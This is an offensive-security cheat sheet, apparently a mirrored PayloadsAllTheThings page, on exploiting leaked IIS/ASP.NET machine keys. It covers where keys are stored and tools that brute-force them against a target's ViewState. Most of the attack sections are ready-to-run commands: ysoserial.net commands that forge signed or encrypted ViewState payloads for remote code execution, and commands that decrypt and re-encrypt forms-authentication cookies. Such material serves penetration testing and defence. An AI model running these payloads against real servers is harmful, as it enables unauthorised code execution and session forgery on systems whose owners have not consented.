daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

iis-machine-keys.md (12553B)


      1 ---
      2 title: "IIS Machine Keys"
      3 topic: "API Key Leaks"
      4 topicSlug: "api-key-leaks"
      5 sourcePath: "API Key Leaks/IIS-Machine-Keys.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/API%20Key%20Leaks/IIS-Machine-Keys.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # IIS Machine Keys
     12 
     13 > That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
     14 
     15 ## Summary
     16 
     17 * [Viewstate Format](#viewstate-format)
     18 * [Machine Key Format And Locations](#machine-key-format-and-locations)
     19 * [Identify Known Machine Key](#identify-known-machine-key)
     20 * [Decode ViewState](#decode-viewstate)
     21 * [Generate ViewState For RCE](#generate-viewstate-for-rce)
     22     * [MAC Is Not Enabled](#mac-is-not-enabled)
     23     * [MAC Is Enabled And Encryption Is Disabled](#mac-is-enabled-and-encryption-is-disabled)
     24     * [MAC Is Enabled And Encryption Is Enabled](#mac-is-enabled-and-encryption-is-enabled)
     25 * [Edit Cookies With The Machine Key](#edit-cookies-with-the-machine-key)
     26 * [References](#references)
     27 
     28 ## Viewstate Format
     29 
     30 ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.
     31 
     32 | Format             | Properties                                                   |
     33 | ------------------ | ------------------------------------------------------------ |
     34 | Base64             | `EnableViewStateMac=False`,  `ViewStateEncryptionMode=False` |
     35 | Base64 + MAC       | `EnableViewStateMac=True`                                    |
     36 | Base64 + Encrypted | `ViewStateEncryptionMode=True`                               |
     37 
     38 By default until Sept 2014, the `enableViewStateMac` property was to set to `False`.
     39 Usually unencrypted viewstate are starting with the string `/wEP`.
     40 
     41 ## Machine Key Format And Locations
     42 
     43 A machineKey in IIS is a configuration element in ASP.NET that specifies cryptographic keys and algorithms used for encrypting and validating data, such as view state and forms authentication tokens. It ensures consistency and security across web applications, especially in web farm environments.
     44 
     45 The format of a machineKey is the following.
     46 
     47 ```xml
     48 <machineKey validationKey="[String]"  decryptionKey="[String]" validation="[SHA1 (default) | MD5 | 3DES | AES | HMACSHA256 | HMACSHA384 | HMACSHA512 | alg:algorithm_name]"  decryption="[Auto (default) | DES | 3DES | AES | alg:algorithm_name]" />
     49 ```
     50 
     51 The `validationKey` attribute specifies a hexadecimal string used to validate data, ensuring it hasn't been tampered with.
     52 
     53 The `decryptionKey` attribute provides a hexadecimal string used to encrypt and decrypt sensitive data.
     54 
     55 The `validation` attribute defines the algorithm used for data validation, with options like SHA1, MD5, 3DES, AES, and HMACSHA256, among others.
     56 
     57 The `decryption` attribute specifies the encryption algorithm, with options like Auto, DES, 3DES, and AES, or you can specify a custom algorithm using alg:algorithm_name.
     58 
     59 The following example of a machineKey is from [Microsoft documentation](https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication).
     60 
     61 ```xml
     62 <machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
     63 ```
     64 
     65 Common locations of **web.config** / **machine.config**
     66 
     67 * 32-bits
     68     * `C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config`
     69     * `C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config`
     70 * 64-bits
     71     * `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config`
     72     * `C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config`
     73 * in the registry when **AutoGenerate** is enabled (extract with [irsdl/machineKeyFinder.aspx](https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab))
     74     * `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4`  
     75     * `HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey`
     76 
     77 ## Identify Known Machine Key
     78 
     79 Try multiple machine keys from known products, Microsoft documentation, or other part of the Internet.
     80 
     81 * [isclayton/viewstalker](https://github.com/isclayton/viewstalker)
     82 
     83     ```powershell
     84     ./viewstalker --viewstate /wEPD...TYQ== -m 3E92B2D6 -M ./MachineKeys2.txt
     85     ____   ____.__                       __         .__   __
     86     \   \ /   /|__| ______  _  _________/  |______  |  | |  | __ ___________ 
     87     \   Y   / |  |/ __ \ \/ \/ /  ___/\   __\__  \ |  | |  |/ // __ \_  __ \
     88     \     /  |  \  ___/\     /\___ \  |  |  / __ \|  |_|    <\  ___/|  | \/
     89     \___/   |__|\___  >\/\_//____  > |__| (____  /____/__|_ \\___  >__|   
     90                     \/           \/            \/          \/    \/       
     91 
     92     KEY FOUND!!!
     93     Host:   
     94     Validation Key: XXXXX,XXXXX
     95     ```
     96 
     97 * [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets)
     98 
     99     ```ps1
    100     python examples/blacklist3r.py --viewstate /wEPDwUK...j81TYQ== --generator 3E92B2D6
    101     Matching MachineKeys found!
    102     validationKey: C50B3C89CB21F4F1422FF158A5B42D0E8DB8CB5CDA1742572A487D9401E3400267682B202B746511891C1BAF47F8D25C07F6C39A104696DB51F17C529AD3CABE validationAlgo: SHA1
    103     ```
    104 
    105 * [irsdl/crapsecrets](https://github.com/irsdl/crapsecrets)
    106 
    107     ```ps1
    108     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -r
    109     python3 ./crapsecrets/examples/cli.py -u http://update.microsoft.com/ -mrd 5
    110     python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -u http://update.microsoft.com/
    111     python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -u http://10.10.10.10:8080/
    112     python3 ./crapsecrets/examples/cli.py -mrd 5 -avsk -fvsp -mkf ./local/aspnet_machinekeys_local.txt -mkf ./crapsecrets/resources/aspnet_machinekeys.txt -u http://10.10.10.10:8080/a1/b/c1/
    113     ```
    114 
    115 * [NotSoSecure/Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
    116 
    117     ```powershell
    118     AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate  --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy
    119     ```
    120 
    121 * [0xacb/viewgen](https://github.com/0xacb/viewgen)
    122 
    123     ```powershell
    124     $ viewgen --guess "/wEPDwUKMTYyOD...WRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
    125     [+] ViewState is not encrypted
    126     [+] Signature algorithm: SHA1
    127     ```
    128 
    129 List of interesting machine keys to use:
    130 
    131 * [NotSoSecure/Blacklist3r/MachineKeys.txt](https://github.com/NotSoSecure/Blacklist3r/raw/f10304bc90efaca56676362a981d93cc312d9087/MachineKey/AspDotNetWrapper/AspDotNetWrapper/Resource/MachineKeys.txt)
    132 * [isclayton/viewstalker/MachineKeys2.txt](https://raw.githubusercontent.com/isclayton/viewstalker/main/MachineKeys2.txt)
    133 * [blacklanternsecurity/badsecrets/aspnet_machinekeys.txt](https://raw.githubusercontent.com/blacklanternsecurity/badsecrets/dev/badsecrets/resources/aspnet_machinekeys.txt)
    134 
    135 ## Decode ViewState
    136 
    137 * [BApp Store > ViewState Editor](https://portswigger.net/bappstore/ba17d9fb487448b48368c22cb70048dc) - ViewState Editor is an extension that allows you to view and edit the structure and contents of V1.1 and V2.0 ASP view state data.
    138 * [0xacb/viewgen](https://github.com/0xacb/viewgen)
    139 
    140     ```powershell
    141     viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
    142     ```
    143 
    144 ## Generate ViewState For RCE
    145 
    146 First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
    147 
    148 **Requirements**:
    149 
    150 * `__VIEWSTATE`
    151 * `__VIEWSTATEGENERATOR`
    152 
    153 ### MAC Is Not Enabled
    154 
    155 ```ps1
    156 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "cmd /c whoami"
    157 ```
    158 
    159 ### MAC Is Enabled And Encryption Is Disabled
    160 
    161 * Find the machine key (validationkey) using `badsecrets`, `viewstalker`, `AspDotNetWrapper.exe` or `viewgen`
    162 
    163     ```ps1
    164     AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --purpose=viewstate  --valalgo=sha1 --decalgo=aes --modifier=CA0B0334 --macdecode --legacy
    165     # --modifier = `__VIEWSTATEGENERATOR` parameter value
    166     # --encrypteddata = `__VIEWSTATE` parameter value of the target application
    167     ```
    168 
    169 * Then generate a ViewState using [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net), both `TextFormattingRunProperties` and `TypeConfuseDelegate` gadgets can be used.
    170 
    171     ```ps1
    172     .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
    173     .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --generator=3E92B2D6 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
    174 
    175     # --generator = `__VIEWSTATEGENERATOR` parameter value
    176     # --validationkey = validation key from the previous command
    177     ```
    178 
    179 ### MAC Is Enabled And Encryption Is Enabled
    180 
    181 Default validation algorithm is `HMACSHA256` and the default decryption algorithm is `AES`.
    182 
    183 If the `__VIEWSTATEGENERATOR` is missing but the application uses .NET Framework version 4.0 or below, you can use the root of the app (e.g: `--apppath="/testaspx/"`).
    184 
    185 * **.NET Framework < 4.5**, ASP.NET always accepts an unencrypted `__VIEWSTATE` if you remove the `__VIEWSTATEENCRYPTED` parameter from the request
    186 
    187     ```ps1
    188     .\ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "cmd /c whoami" --apppath="/testaspx/" --islegacy --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" --isdebug
    189     ```
    190 
    191 * **.NET Framework > 4.5**, the machineKey has the property: `compatibilityMode="Framework45"`
    192 
    193     ```ps1
    194     .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"
    195     ```
    196 
    197 ## Edit Cookies With The Machine Key
    198 
    199 If you have the `machineKey` but the viewstate is disabled.
    200 
    201 ASP.net Forms Authentication Cookies : [liquidsec/aspnetCryptTools](https://github.com/liquidsec/aspnetCryptTools)
    202 
    203 ```powershell
    204 # decrypt cookie
    205 $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
    206 
    207 # encrypt cookie (edit Decrypted.txt)
    208 $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
    209 ```
    210 
    211 ## References
    212 
    213 * [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://web.archive.org/web/20250916225422/https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
    214 * [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://web.archive.org/web/20250806010506/https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
    215 * [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://web.archive.org/web/20250810191756/https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
    216 * [Project Blacklist3r - @notsosecure - November 23, 2018](https://web.archive.org/web/20260116051627/https://notsosecure.com/project-blacklist3r)
    217 * [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://web.archive.org/web/20260107194152/https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)